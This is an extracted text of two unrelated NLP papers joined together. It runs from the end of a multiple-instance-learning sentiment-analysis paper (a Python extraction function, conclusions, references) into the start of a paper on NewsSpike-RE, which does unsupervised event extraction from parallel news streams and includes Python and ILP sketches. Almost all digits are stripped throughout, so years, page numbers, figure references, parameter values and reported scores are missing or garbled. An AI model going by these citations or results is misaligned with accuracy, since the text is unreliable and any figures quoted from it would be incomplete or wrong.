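    ranked = sorted(zip(segments, scores), key=lambda x: abs(x[1]), reverse=True)
    extract, used = [], 0
    for seg, score in ranked:
        seg_len = len(seg.split())
        if extract and used + seg_len > budget:
            continue   # skip segments that would exceed the compression budget
        extract.append((seg, score))
        used += seg_len
    return extract
```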
example edu- and sentence-based summaries produced by gated variants of hiernet and mil- net are shown in figure , with attention weights and polarity scores of the extracted segments shown in round and square brackets respectively. for both granularities, hiernet’s positive document-level prediction results in a single polarity score assigned to every segment, and further adjusted using the cor- responding attention weights. the extracted seg- ments are informative, but fail to capture the neg- ative sentiment of some segments. in contrast, mil- net is able to detect positive and negative snippets via individual segment polarities. here, edu seg- mentation produced a more concise summary with a clearer grouping of positive and negative snippets. conclusions in this work, we presented a neural network model for fine-grained sentiment analysis within the frame- work of multiple instance learning. our model can be trained on large scale sentiment classifica- tion datasets, without the need for segment-level labels. as a departure from the commonly used vector-based composition, our model first predicts sentiment at the sentence- or edu-level and subse- quently combines predictions up the document hier- archy. an attention-weighted polarity scoring tech- nique provides a natural way to extract sentiment- heavy opinions. experimental results demonstrate the superior performance of our model against more conventional neural architectures. human evalua- tion studies also show that milnet opinion extracts are preferred by participants and are effective at cap- turing informativeness and polarity, especially when using edu segments. in the future, we would like to focus on multi-document, aspect-based extraction (cao et al., ) and ways of improving the coher- ence of our summaries by taking into account more fine-grained discourse information (daumé iii and marcu, ). acknowledgments the authors gratefully acknowledge the support of the european research council (award num- ber ). we thank tacl action editor ani nenkova and the anonymous reviewers whose feed- back helped improve the present paper, as well as charles sutton, timothy hospedales, and members of edinburghnlp for helpful discussions and sug- gestions. references stuart andrews and thomas hofmann. . multiple instance learning via disjunctive programming boost- ing. in advances in neural information processing systems , pages – . curran associates, inc. stefano baccianella, andrea esuli, and fabrizio sebas- tiani. . sentiwordnet . : an enhanced lexi- cal resource for sentiment analysis and opinion min- ing. in proceedings of the th conference on in- ternational language resources and evaluation, vol- ume , pages – , valletta, malta. dzmitry bahdanau, kyunghyun cho, and yoshua ben- gio. . neural machine translation by jointly learning to align and translate. in proceedings of the rd international conference on learning represen- tations, san diego, california, usa. parminder bhatia, yangfeng ji, and jacob eisenstein. . better document-level sentiment analysis from rst discourse parsing. in proceedings of the conference on empirical methods in natural lan- guage processing, pages – , lisbon, portu- gal. ziqiang cao, wenjie li, sujian li, and furu wei. . improving multi-document summarization via text classification. in proceedings of the st aaai con- ference on artificial intelligence, pages – , san francisco, california, usa. peter carbonetto, gyuri dorkó, cordelia schmid, hen- drik kück, and nando de freitas. . 
learning to recognize objects with little supervision. international journal of computer vision, ( ): – . giuseppe carenini, rymond ng, and adam pauls. . multidocument summarization of evaluative text. in proceedings of the th conference of the european chapter of the association for computational linguis- tics, pages – , trento, italy. lynn carlson, daniel marcu, and mary ellen okurowski. . building a discourse-tagged corpus in the framework of rhetorical structure theory. in current and new directions in discourse and dialogue, pages – . springer. jianpeng cheng and mirella lapata. . neural sum- marization by extracting sentences and words. in pro- ceedings of the th annual meeting of the associa- tion for computational linguistics (volume : long papers), pages – , berlin, germany. timothee cour, ben sapp, and ben taskar. . learn- ing from partial labels. journal of machine learning research, (may): – . hal daumé iii and daniel marcu. . a noisy-channel model for document compression. in proceedings of the th annual meeting of the association for com- putational linguistics, pages – , philadelphia, pennsylvania, usa. misha denil, alban demiraj, and nando de freitas. . extraction of salient sentences from labelled documents. technical report, university of oxford. giuseppe di fabbrizio, amanda stent, and robert gaizauskas. . a hybrid approach to multi- document summarization of opinions in reviews. in proceedings of the th international natural lan- guage generation conference (inlg), pages – , philadelphia, pennsylvania, usa. qiming diao, minghui qiu, chao-yuan wu, alexan- der j. smola, jing jiang, and chong wang. . jointly modeling aspects, ratings and sentiments for movie recommendation (jmars). in proceedings of the th acm sigkdd international conference on knowledge discovery and data mining, pages – , new york, ny, usa. thomas g. dietterich, richard h. lathrop, and toms lozano-prez. . solving the multiple instance problem with axis-parallel rectangles. artificial intel- ligence, ( ): – . wei vanessa feng and graeme hirst. . text-level discourse parsing with rich linguistic features. in pro- ceedings of the th annual meeting of the associa- tion for computational linguistics (volume : long papers), pages – , jeju island, korea. kavita ganesan, chengxiang zhai, and jiawei han. . opinosis: a graph based approach to abstrac- tive summarization of highly redundant opinions. in proceedings of the rd international conference on computational linguistics, pages – , beijing, china. shima gerani, yashar mehdad, giuseppe carenini, ray- mond t. ng, and bita nejat. . abstractive sum- marization of product reviews using discourse struc- ture. in proceedings of the conference on empirical methods in natural language processing, pages – , doha, qatar. raphael hoffmann, congle zhang, xiao ling, luke zettlemoyer, and daniel s weld. . knowledge- based weak supervision for information extraction of overlapping relations. in proceedings of the th an- nual meeting of the association for computational linguistics: human language technologies-volume , pages – , portland, oregon, usa. minqing hu and bing liu. . mining and summa- rizing customer reviews. in proceedings of the th acm sigkdd international conference on knowl- edge discovery and data mining, pages – , seattle, washington, usa. rie johnson and tong zhang. a. effective use of word order for text categorization with convolu- tional neural networks. 
in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, pages – , denver, col- orado, usa. rie johnson and tong zhang. b. semi-supervised convolutional neural networks for text categorization via region embedding. in advances in neural infor- mation processing systems , pages – . curran associates, inc. jim keeler and david e. rumelhart. . a self-organizing integrated segmentation and recogni- tion neural net. in advances in neural informa- tion processing systems , pages – . morgan- kaufmann. yoon kim. . convolutional neural networks for sen- tence classification. in proceedings of the con- ference on empirical methods in natural language processing, pages – , doha, qatar. dimitrios kotzias, misha denil, nando de freitas, and padhraic smyth. . from group to individual la- bels using deep features. in proceedings of the th acm sigkdd international conference on knowl- edge discovery and data mining, pages – , sydney, australia. quoc le and tomas mikolov. . distributed repre- sentations of sentences and documents. in proceed- ings of the st international conference on machine learning, pages – , beijing, china. kevin lerman, sasha blair-goldensohn, and ryan mc- donald. . sentiment summarization: evaluating and learning user preferences. in proceedings of the th conference of the european chapter of the acl, pages – , athens, greece. junyi jessy li, kapil thadani, and amanda stent. . the role of discourse units in near-extractive summa- rization. in proceedings of the sigdial con- ference, the th annual meeting of the special inter- est group on discourse and dialogue, pages – , los angeles, california, usa. william c. mann and sandra a. thompson. . rhetorical structure theory: toward a functional the- ory of text organization. text-interdisciplinary jour- nal for the study of discourse, ( ): – . oded maron and aparna lakshmi ratan. . multiple-instance learning for natural scene classifica- tion. in proceedings of the th international con- ference on machine learning, volume , pages – , san francisco, california, usa. ramesh nallapati, feifei zhai, and bowen zhou. . summarunner: a recurrent neural network based se- quence model for extractive summarization of docu- ments. in proceedings of the st aaai conference on artificial intelligence, pages – , san fran- cisco, california. ani nenkova. . automatic text summarization of newswire: lessons learned from the document under- standing conference. in proceedings of the th aaai, pages – , pittsburgh, pennsylvania, usa. eric noreen. . computer-intensive methods for testing hypotheses: an introduction. wiley. bo pang and lillian lee. . seeing stars: ex- ploiting class relationships for sentiment categoriza- tion with respect to rating scales. in proceedings of the rd annual meeting on association for compu- tational linguistics, pages – . association for computational linguistics. bo pang, lillian lee, and shivakumar vaithyanathan. . thumbs up? sentiment classification using ma- chine learning techniques. in proceedings of the conference on empirical methods in natural lan- guage processing, pages – , pittsburgh, pennsyl- vania, usa. nikolaos pappas and andrei popescu-belis. . ex- plaining the stars: weighted multiple-instance learn- ing for aspect-based sentiment analysis. in proceed- ings of the conference on empirical methods in natural language processing, pages – , doha, qatar, october. nikolaos pappas and andrei popescu-belis. . 
ex- plicit document modeling through weighted multiple- instance learning. journal of artificial intelligence re- search, : – . lizhen qu, georgiana ifrim, and gerhard weikum. . the bag-of-opinions method for review rating prediction from sparse text patterns. in proceedings of the rd international conference on computational linguistics, pages – , beijing, china. richard socher, jeffrey pennington, eric h. huang, an- drew y. ng, and christopher d. manning. . semi-supervised recursive autoencoders for predicting sentiment distributions. in proceedings of the conference on empirical methods in natural lan- guage processing, pages – , edinburgh, scot- land, uk. richard socher, alex perelygin, jean wu, jason chuang, christopher d. manning, andrew y. ng, and christo- pher potts. . recursive deep models for semantic compositionality over a sentiment treebank. in pro- ceedings of the conference on empirical meth- ods in natural language processing, pages – , seattle, washington, usa. maite taboada, julian brooke, milan tofiloski, kimberly voll, and manfred stede. . lexicon-based meth- ods for sentiment analysis. computational linguis- tics, ( ): – . oscar täckström and ryan mcdonald. . discov- ering fine-grained sentiment with latent variable struc- tured prediction models. in proceedings of the th european conference on information retrieval, pages – , aberdeen, scotland, uk. duyu tang, bing qin, and ting liu. . document modeling with gated recurrent neural network for sen- timent classification. in proceedings of the con- ference on empirical methods in natural language processing, pages – , lisbon, portugal. peter d turney. . thumbs up or thumbs down?: semantic orientation applied to unsupervised classifi- cation of reviews. in proceedings of the th annual meeting on association for computational linguistics, pages – , pittsburgh, pennsylvania, usa. sida wang and christopher d. manning. . base- lines and bigrams: simple, good sentiment and topic classification. in proceedings of the th annual meeting of the association for computational linguis- tics: short papers-volume , pages – , jeju island, korea. xiu-shen wei, jianxin wu, and zhi-hua zhou. . scalable multi-instance learning. in proceedings of the ieee international conference on data mining, pages – , shenzhen, china. nils weidmann, eibe frank, and bernhard pfahringer. . a two-level learning method for generalized multi-instance problems. in proceedings of the th european conference on machine learning, pages – , dubrovnik, croatia. janyce wiebe, theresa wilson, and claire cardie. . annotating expressions of opinions and emotions in language. language resources and evaluation, ( ): – . jiajun wu, yinan yu, chang huang, and kai yu. . deep multiple instance learning for image classifica- tion and auto-annotation. in proceedings of the ieee conference on computer vision and pattern recogni- tion, pages – , boston, massachusetts, usa. rui xia and chengqing zong. . exploring the use of word relation features for sentiment classification. in proceedings of the rd international conference on computational linguistics: posters, pages – , beijing, china. xin xu and eibe frank. . logistic regression and boosting for labeled bags of instances. in proceed- ings of the pacific-asia conference on knowledge dis- covery and data mining, pages – . springer- verlag. wei xu, alan ritter, chris callison-burch, william b. dolan, and yangfeng ji. . extracting lexically divergent paraphrases from twitter. 
transactions of the association for computational linguistics, : – . zichao yang, diyi yang, chris dyer, xiaodong he, alex smola, and eduard hovy. . hierarchical atten- tion networks for document classification. in pro- ceedings of the conference of the north ameri- can chapter of the association for computational lin- guistics: human language technologies, pages – , san diego, california, usa. matthew d. zeiler. . adadelta: an adaptive learning rate method. corr, abs/ . . qi zhang, sally a. goldman, wei yu, and jason e. fritts. . content-based image retrieval using multiple- instance learning. in proceedings of the th inter- national conference on machine learning, volume , pages – , sydney, australia. cha zhang, john c. platt, and paul a. viola. . mul- tiple instance boosting for object detection. in ad- vances in neural information processing systems , pages – . mit press. zhi-hua zhou, yu-yin sun, and yu-feng li. . multi-instance learning by treating instances as non- iid samples. in proceedings of the th annual in- ternational conference on machine learning, pages – , montréal, quebec. exploiting parallel news streams for unsupervised event extraction congle zhang, stephen soderland & daniel s. weld computer science & engineering university of washington seattle, wa , usa {clzhang, soderlan, weld}@cs.washington.edu abstract most approaches to relation extraction, the task of extracting ground facts from natural language text, are based on machine learning and thus starved by scarce training data. man- ual annotation is too expensive to scale to a comprehensive set of relations. distant super- vision, which automatically creates training data, only works with relations that already populate a knowledge base (kb). unfortu- nately, kbs such as freebase rarely cover event relations (e.g. “person travels to loca- tion”). thus, the problem of extracting a wide range of events — e.g., from news streams — is an important, open challenge. this paper introduces newsspike-re, a novel, unsupervised algorithm that discovers event relations and then learns to extract them. newsspike-re uses a novel probabilistic graphical model to cluster sentences describ- ing similar events from parallel news streams. these clusters then comprise training data for the extractor. our evaluation shows that newsspike-re generates high quality train- ing sentences and learns extractors that per- form much better than rival approaches, more than doubling the area under a precision-recall curve compared to universal schemas. introduction relation extraction, the process of extracting struc- tured information from natural language text, grows increasingly important for web search and ques- tion answering. traditional supervised approaches, which can achieve high precision and recall, are lim- ited by the cost of labeling training data and are un- likely to scale to the thousands of relations on the web. another approach, distant supervision (craven and kumlien, ; wu and weld, ), creates its own training data by matching the ground instances of a knowledge base (kb) (e.g. freebase) to the un- labeled text. unfortunately, while distant supervision can work well in some situations, the method is limited to rela- tively static facts (e.g., born-in(person, location) or capital-of(location,location)) where there is a cor- responding knowledge base. but what about dy- namic event relations (also known as fluents), such as travel-to(person, location) or fire(organization, person)? 
since these time-dependent facts are ephemeral, they are rarely stored in a pre-existing kb. at the same time, knowledge of real-time events is crucial for making informed decisions in fields like finance and politics. indeed, news stories report events almost exclusively, so learning to extract events is an important open problem.

this paper develops a new unsupervised technique, newsspike-re, to both discover event relations and extract them with high precision. the intuition underlying newsspike-re is that the texts of articles from two different news sources are not independent, since they are each conditioned on the same real-world events. by looking for rarely described entities that suddenly "spike" in popularity on a given date, one can identify paraphrases. such temporal correspondence (zhang and weld, ) allows one to cluster diverse sentences, and the resulting clusters may be used to form training data in order to learn event extractors. furthermore, one can also exploit parallel news to obtain direct negative evidence. to see this, suppose one day the news includes the following: (a) "snowden travels to hong kong, off southeastern china." (b) "snowden cannot stay in hong kong as chinese officials will not allow ..." since news stories are usually coherent, it is highly unlikely that travel to and stay in (which is negated) are synonymous. by leveraging such direct negative phrases, we can learn extractors capable of distinguishing heavily co-occurring but semantically different phrases, thereby avoiding many extraction errors. our newsspike-re system encapsulates these intuitions in a novel graphical model, making the following contributions:

• we develop a method to discover a set of distinct, salient event relations from news streams.
• we describe an algorithm to exploit parallel news streams to cluster sentences that belong to the same event relations. in particular, we propose the temporal negation heuristic to avoid conflating co-occurring but non-synonymous phrases.
• we introduce a probabilistic graphical model to generate training data for a sentential event extractor without requiring any human annotations.
• we present detailed experiments demonstrating that the event extractors, learned from the generated training data, significantly outperform several competitive baselines; e.g., our system more than doubles the area under the micro-averaged pr curve ( . vs. . ) compared to riedel's universal schemas (riedel et al., ).

previous work

supervised learning approaches have been widely developed for event extraction tasks such as muc- and ace. they often focus on a hand-crafted ontology and train the extractor with manually created training data. while they can offer high precision and recall, they are often domain-specific (e.g., biological events (riedel et al., ; mcclosky et al., ) and entertainment events (benson et al., ; reichart and barzilay, )), and are hard to scale over the events on the web.

open ie systems extract open-domain relations (e.g., (banko et al., ; fader et al., )) and events (e.g., (ritter et al., )). they often perform self-supervised learning of relation-independent extractions. this allows them to scale but makes them unable to output canonicalized relations.
distant supervised approaches have been developed to learn extractors by exploiting the facts existing in a knowledge base, thus avoiding human annotation. wu et al. ( ) and reschke et al. ( ) learned infobox relations from wikipedia, while mintz et al. ( ) heuristically matched freebase facts to texts. since the training data generated by the heuristic matching is often imperfect, multi-instance learning approaches (riedel et al., ; hoffmann et al., ; surdeanu et al., ) have been developed to combat this problem. unfortunately, most facts existing in kbs are static facts like geographical or biographical data. they fall short of learning extractors for fluent facts such as sports results or travel and meetings by a person.

bootstrapping is another common extraction technique (brin, ; agichtein and gravano, ; carlson et al., ; nakashole et al., ; huang and riloff, ). this typically takes a set of seeds as input, which can be ground instances or key phrases. the algorithms then iteratively generate more positive instances and phrases. while there are many successful examples of bootstrapping, the challenge is to avoid semantic drift. large-scale systems, therefore, often require extra processing such as manual validation between the iterations or additional negative seeds as input.

unsupervised approaches have been developed for relation discovery and extraction. these algorithms are usually based on some clustering assumptions over a large unlabeled corpus. common assumptions include the distributional hypothesis used by (hasegawa et al., ; shinyama and sekine, ), the latent topic assumption of (yao et al., ; yao et al., ), and the low-rank assumption of (takamatsu et al., ; riedel et al., ). since these assumptions largely rely on co-occurrence, previous unsupervised approaches tend to confuse correlated but semantically different phrases during extraction. in contrast, our work largely avoids these errors by exploiting the temporal negation heuristic in parallel news streams. in addition, unlike many unsupervised algorithms requiring human effort to canonicalize the clusters, our work automatically discovers events with readable names.

paraphrasing techniques inspire our work. some techniques, such as dirt (lin and pantel, ) and resolver (yates and etzioni, ), are based on the distributional hypothesis. another common approach is to use parallel corpora, including news streams (barzilay and lee, ; dolan et al., ; zhang and weld, ), multiple translations of the same story (barzilay and mckeown, ), and bilingual sentence pairs (ganitkevitch et al., ), to generate the paraphrases. although these algorithms create many good paraphrases, they cannot be directly used to generate enough training data to train a relation extractor for two reasons: first, the semantics of the paraphrases is often context dependent; second, the generated paraphrases are often in small clusters, and it remains challenging to merge them for the purpose of training an extractor. our work extends previous paraphrasing techniques, notably that of zhang and weld ( ), but we focus on generating high-quality, positive and negative training sentences for the discovered events in order to learn extractors with high precision and recall.

figure : overview of newsspike-re (parallel news streams → newsspikes ns = (a1, a2, d, s) → discovered event relations e = e(t1, t2) → generated training sentences → learned event extractor → extractions s → e(a1, a2)). during its training phase, newsspike-re first groups parallel sentences as newsspikes. next, the system automatically discovers a set of event relations. then, a probabilistic graphical model clusters sentences from the newsspikes as training data for each discovered relation, which is used to learn sentential event extractors. during the testing phase, the extractor takes test sentences as input and predicts event extractions.
system overview

news articles report an enormous number of events every day. our system, newsspike-re, aligns parallel news streams to identify and extract these events as shown in figure . newsspike-re has both training and test phases. its training phase has two main steps: event-relation discovery and training-set generation. section describes our event relation discovery algorithm, which processes time-stamped news articles to discern a set of salient, distinct event relations in the form of e = e(t1, t2), where e is a representative event phrase and the ti are the types of the two arguments. newsspike-re generates the event phrases using an open information extraction (ie) system (fader et al., ), and uses a fine-grained entity recognition system, figer (ling and weld, ), to generate type descriptors such as "company", "politician", and "medical treatment".

the second part of newsspike-re's training phase, described in section , is a method for building extractors for the discovered event relations. our approach is motivated by the intuition, adapted from zhang and weld ( ), that articles from different news sources typically use different sentences to describe the same event, and that corresponding sentences can be identified when they mention a unique pair of real-world entities. for example, when an unusual entity pair (selena, norway) is suddenly seen in three articles on a single day:

selena traveled to norway to see her ex-boyfriend.
selena arrived in norway for a rendezvous with justin.
selena's trip to norway was no coincidence.

it is likely that all three refer to the same event relation, travel-to(person, location), and can be used as positive training examples for the relation. as in zhang & weld ( ), we group parallel sentences sharing the same argument pair and date in a structure called a newsspike. however, we include all sentences mentioning the arguments (e.g., selena's trip to norway) in the newsspike (not just those yielding openie extractions), and use the lexicalized dependency path between the arguments (e.g., <-[poss]-trip-[prep-to]->) as the event phrase. in this way, we can generalize extractors beyond the scope of openie. formally, a newsspike is a tuple (a1, a2, d, s), where a1 and a2 are arguments (e.g., selena), d is a date, and s is a set of argument-labeled sentences {(s, a1, a2, p), ...} in which s is a sentence with arguments ai and event phrase p.

it's important that non-synonymous sentences like "selena stays in norway" should be excluded from the training data for travel-to(person, location) even if a travel-to event did apply to that argument pair. in order to select only the synonymous sentences, we develop a probabilistic graphical model, described in section . , to accurately assign sentences from newsspikes to each discovered event relation e.
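a minimal sketch of the newsspike grouping just described is shown below; the field names and types are illustrative, and the argument and event-phrase annotations are assumed to come from the openie and dependency-path machinery mentioned above.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

@dataclass
class LabeledSentence:
    text: str          # raw sentence
    arg1: str          # first argument mention, e.g. "Selena"
    arg2: str          # second argument mention, e.g. "Norway"
    event_phrase: str  # OpenIE phrase or lexicalized dependency path

@dataclass
class NewsSpike:
    arg1: str
    arg2: str
    date: str                                              # publication date
    sentences: List[LabeledSentence] = field(default_factory=list)

def build_newsspikes(dated_sentences: List[Tuple[str, LabeledSentence]]) -> List[NewsSpike]:
    """Group argument-labeled sentences that share the same (arg1, arg2, date)."""
    spikes: Dict[Tuple[str, str, str], NewsSpike] = {}
    for date, sent in dated_sentences:
        key = (sent.arg1, sent.arg2, date)
        if key not in spikes:
            spikes[key] = NewsSpike(sent.arg1, sent.arg2, date)
        spikes[key].sentences.append(sent)
    return list(spikes.values())
```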
given this annotated data, newsspike-re trains extractors using a multi-class logistic regression classifier. during the testing phase, newsspike-re accepts arbitrary sentences (no date-stamp required), uses figer to identify possible arguments, and uses the classifier to predict which events (if any) hold between an argument pair. we describe the extraction process in section . note that newsspike-re is an unsupervised algorithm that requires no manual labelling of the training instances. like distant supervision, the key is to automatically generate the training data, at which point a traditional supervised classifier may be applied to learn an extractor. because distant supervision creates very noisy annotations, researchers often use specialized learners that model the correctness of a training example with a latent variable (riedel et al., ; hoffmann et al., ), but we found this unnecessary, because newsspike-re creates high quality training data.

(footnotes: for clarity in the paper, we refer to this relation as travel-to, even though the phrase arrive in is actually more frequent and is selected as the name of this relation by our event discovery algorithm, as shown in table . the dependency path above will be referred to as "'s trip to".)

figure : a simple example of the edge-cover algorithm with k = , where the ei are event relations and the ηj are newsspikes. the optimal solution selects e with edges to η and η , and e with an edge to η . these two event relations cover all the newsspikes.

discovering salient events

the first step of newsspike-re is to discover a set of event relations in the form of e = e(t1, t2), where e is an event phrase and the ti are fine-grained argument types generated by figer, augmented with the important types "number" and "money", which are recognized by the stanford named entity recognition system (finkel et al., ). to be most useful, the discovered event relations should cover salient events that are frequently reported in news articles. formally, we say that a newsspike η = (a1, a2, d, s) mentions e = e(t1, t2) if the types of the ai are ti for each i, and one of its sentences has e as the event phrase between the arguments. to maximize the salience of the events, newsspike-re will prefer event relations that are "mentioned" by more newsspikes.

in addition, the set of event relations should be distinct. for example, if the relation travel-to(person, location) is already in the set, then visit(person, location) should not be selected as a separate relation. to reduce overlap, discovered event relations should not be mentioned by the same newsspike.

let e be all candidate event relations and n be all newsspikes. our goal is to select the k most salient relations from e, minimizing overlap between relations. we can frame this task as a variant of the bipartite graph edge-cover problem. let a bipartite graph g have one node ei for each event relation in e and one node ηj for each newsspike in n. there is an edge between ei and ηj if ηj mentions ei. the edge-cover problem is to select the largest subset of edges subject to (1) at most k nodes among the ei are chosen, and all edges incident to them are chosen as the covered edges; (2) each node ηj is incident to at most one covered edge. the first constraint guarantees that there are exactly k event relations discovered; the second constraint ensures that no newsspike participates in two event relations.
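one way to make this selection concrete is to write it as a small integer linear program. the sketch below uses the pulp library, takes the mention graph as a list of (relation, newsspike) edges, and mirrors the two constraints above; the data layout and the use of pulp are assumptions for illustration, not the authors' implementation.

```python
import pulp

def select_salient_relations(edges, k):
    """edges: (relation_name, spike_id) pairs, one per newsspike that mentions
    the candidate relation.  Returns k relations that cover the most
    newsspikes, counting each newsspike for at most one relation."""
    edges = sorted(set(edges))
    relations = sorted({r for r, _ in edges})
    spikes = sorted({s for _, s in edges})

    prob = pulp.LpProblem("edge_cover", pulp.LpMaximize)
    use_rel = pulp.LpVariable.dicts("rel", relations, cat="Binary")
    use_edge = pulp.LpVariable.dicts("edge", edges, cat="Binary")

    # objective: maximize the number of covered (relation, newsspike) edges
    prob += pulp.lpSum(use_edge[e] for e in edges)
    # constraint 1: exactly k relations are selected
    prob += pulp.lpSum(use_rel[r] for r in relations) == k
    # an edge can only be covered if its relation is selected
    for r, s in edges:
        prob += use_edge[(r, s)] <= use_rel[r]
    # constraint 2: each newsspike participates in at most one covered edge
    for s in spikes:
        prob += pulp.lpSum(use_edge[(r, s2)] for r, s2 in edges if s2 == s) <= 1

    prob.solve(pulp.PULP_CBC_CMD(msg=False))
    return [r for r in relations if use_rel[r].value() == 1]
```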
figure shows the optimized solution of a simple graph with k = , which can cover edges with event relations that have no overlapping newsspikes. since both the objective function and constraints are linear, we can optimize this edge-cover problem with integer linear programming (nemhauser and wolsey, ). by solving the optimization prob- lem, newsspike-re finds a salient set of event re- lations incident to the covered edges. the discov- ered relations with k set to are shown in table in section . in addition, the covered edges bring us the initial mapping between the event types and newsspikes, which is used to train the probablistic model in section . . generating the training sentences after newsspike-re has discovered a set of event relations, it then generates training instances to learn an extractor for each relation. in this section, we present our algorithm for generating the training sentences. as shown in figure , the generator takes n newsspikes {ηi = (a i,a i,di,si)|i = . . .n} and k event relations {ek = ek(t k, t k)|k = . . .k} as input. for every event relation, ek, the generator identifies a subset of sentences from ∪ni= si expressing the event relation as training sen- tences. in this section, we first characterize the paraphrased event phrases and the parallel sentences in newsspikes. then we show how to encode this heuristic in a probabilistic graphical model that jointly paraphrases the event phrases and identifies a set of training sentences. . exploiting properties of parallel news previous work (zhang and weld, ) proposed several heuristics that are useful to find similar sen- tences in a newsspike. for example, the tempo- ral functionality heuristic says that sentences in a newsspike with the same tense tend to be para- phrases. unfortunately, these methods are too weak to generate enough data for training high quality event extractors: ( ) they are “in-spike heuristics” that tend to generate small clusters from individual newsspikes. it remains unclear how to merge sim- ilar events occuring on different days and between different entities to increase cluster size. ( ) they in- cluded heuristics to “gain precision at the expense of recall” (e.g. news articles do not state the same fact twice), because it is hard to obtain direct nega- tive phrases inside one newsspike. in this paper, we exploit news streams in a cross-spike, global man- ner to obtain accurate positive and negative signals. this allows us to dramatically improve recall while maintaining high precision. our system starts from the basic observation that the parallel sentences tend to be coherent. so if a newsspike η = (a ,a ,d,s) is an instance of an event relation e = e(t , t ), the event phrases in its parallel sentences tend to be paraphrases. but some- times the sentences in the newsspike are related but not paraphrases. for example, one day “snowden will stay in hong kong ...” appears together with “snowden travels to hong kong ...”. although the fact stay-in(snowden, hong kong) is true, it is harm- ful to include “snowden will stay in hong kong” in the training for travel-to(person, location). detecting paraphrases remains a challenge to most unsupervised approaches because they tend to cluster heavily co-occurring phrases which may turn out to be semantically different or even antony- mous. (zhang and weld, ) presented a method to avoid confusion between antonym and synonyms in newsspikes, but did not address the problem of related but different phrases like travel to and stay in in a newsspike. 
to handle this, our method rests on a simple observation: when you read "snowden travels to hong kong" and "snowden cannot stay in hong kong as chinese officials do not allow ..." in the same newsspike, it is unlikely that travel to and stay in are synonymous event phrases, because otherwise the two news stories would be describing opposite events. this observation leads to:

temporal negation heuristic. two event phrases p and q tend to be semantically different if they co-occur in the newsspike but one of them is in negated form.

the temporal negation heuristic helps in two ways: (1) it provides some direct negative phrases for the event relations; newsspike-re uses these to heuristically label some variables in the model. (2) it creates some useful features to implement a form of transitivity. for example, if we find that live in and stay in are frequently co-occurring, and the temporal negation heuristic tells us that travel to and stay in are not paraphrases, this is evidence that live in is unlikely to be a paraphrase of travel to, even if the two are heavily co-occurring.

the following section describes our implementation, which uses these properties to generate high quality training data. our goal is the following: a sentence (s, a1, a2, p) from newsspike η = (a1, a2, d, s) should be included in the training data for event relation e = e(t1, t2) if the event phrase p is a paraphrase of e and the event relation e happens to the argument pair (a1, a2) at time d.

. joint cluster model

as discussed above, to identify a high quality set of training sentences from newsspikes, one needs to combine evidence that event phrases are paraphrases with evidence from newsspikes. for this purpose, we define an undirected graphical model to jointly reason about paraphrasing the event phrases and identifying the training sentences from newsspikes. we first list the notation used in this section:

e — event relation
p ∈ p — event phrases
s ∈ s_p — sentences with the event phrase p
y_p — is p a paraphrase for e?
z_sp — is s with p a good training sentence for e?
Φ — factors

let p be the union of all the event phrases from every newsspike. for each p ∈ p, let s_p be the set of sentences having p as their event phrase. figure (a) shows the model in plate form. there are two kinds of random variables, corresponding to phrases and sentences respectively. for each event relation e = e(t1, t2), there exists a connected component for every event phrase p ∈ p that models (1) whether p is a paraphrase of e or not (modeled using a boolean phrase variable y_p), and (2) whether each sentence of s_p is a good training sentence for e (modeled using |s_p| boolean sentence variables {z_sp | s ∈ s_p}). intuitively, the goal of the model is to find the set of good training sentences, those with z_sp = 1.

figure : (a) the connected components depicted as a plate model, where each y is a boolean variable for a relation phrase and each z is a boolean variable for a training sentence with that phrase; (b) and (c) are example connected components for the event phrases 's trip to and stay in respectively (example sentences include "selena gomez's trip to norway", "for ucla's trip to nebraska", "tsarnaev's six-month trip to russia escapes the fbi's attention", "snowden plans to stay in hongkong", and "manziel stays in austin to attend a fraternity party"). the goal of the model is to set y = 1 for good paraphrases of a relation and z = 1 for good training sentences.
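the factor structure sketched in the figure can be made concrete with a small, deliberately brute-force map routine over one connected component. the factor and feature definitions follow in the next paragraphs, so the feature dictionaries and weights below are placeholders, and the real system performs map inference with an ilp rather than by enumeration.

```python
from itertools import product

def map_assignment(phrase_feats, sent_feats, pair_feats, w_phrase, w_in, w_cross):
    """Brute-force MAP for one connected component: one phrase variable y and
    one sentence variable z_i per sentence.  Feature vectors and weights are
    plain dicts keyed by feature name.  Only practical for small components."""
    def dot(w, f):
        return sum(w.get(k, 0.0) * v for k, v in f.items())

    n = len(sent_feats)
    best, best_score = None, float("-inf")
    for y in (0, 1):
        for z in product((0, 1), repeat=n):
            # joint factor: a sentence can only be good training data
            # if its event phrase is a paraphrase of the relation (y = 1)
            if y == 0 and any(z):
                continue
            score = y * dot(w_phrase, phrase_feats)                          # phrase factor
            score += sum(zi * dot(w_in, f) for zi, f in zip(z, sent_feats))  # in-spike factors
            score += sum(z[i] * z[j] * dot(w_cross, f)                       # cross-spike factors
                         for (i, j), f in pair_feats.items())
            if score > best_score:
                best, best_score = (y, list(z)), score
    return best, best_score
```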
the union of such sentences over the different phrases, ∪_p {s | z_sp = 1}, defines the training sentences for the event. figures (b) and (c) show two example connected components for the event phrases 's trip to and stay in respectively.

now we can define the joint distribution over the event phrases and the sentences. the joint distribution is a function defined on factors that encode our observations about newsspikes as features and constraints. the phrase factor Φ_phrase is a log-linear function attached to y_p with the paraphrasing features, such as whether p and e co-occur in the newsspikes, or whether p shares the same head word with e. these features are used to distinguish whether p is a good event phrase.

a sentence should not be identified as a good training sentence if it does not contain a positive event phrase. for example, if y_{stay in} in figure (b) takes the value 0, then all sentences with the event phrase stay in should also take the value 0. we implement this constraint with a joint factor Φ_joint among the y_p and z_sp variables.

in addition, good training sentences occur when the newsspike is an event instance. to encode this observation, we need to featurize the newsspikes and let them bias the assignments. our model implements this with two types of log-linear factors: (1) the unary in-spike factor Φ_in depends on the sentence variables and contains features about the corresponding newsspike. the factor is used to distinguish whether the newsspike is an instance of e(t1, t2), such as whether the argument types of the newsspike match the designated types t1, t2. (2) the pairwise cross-spike factors Φ_cross connect pairs of sentences. these use features such as whether the pair of newsspikes for the two sentences have high textual similarity, and whether the two newsspikes contain negated event phrases.

we define the joint distribution for the connected component for p as follows. let z be the vector of sentence variables and let x be the features. the joint distribution is:

p(y = y, z = z | x; Θ) def= (1/z_x) Φ_phrase(y, x) · Φ_joint(y, z) · ∏_s Φ_in(z_s, x) · ∏_{s,s′} Φ_cross(z_s, z_s′, x)

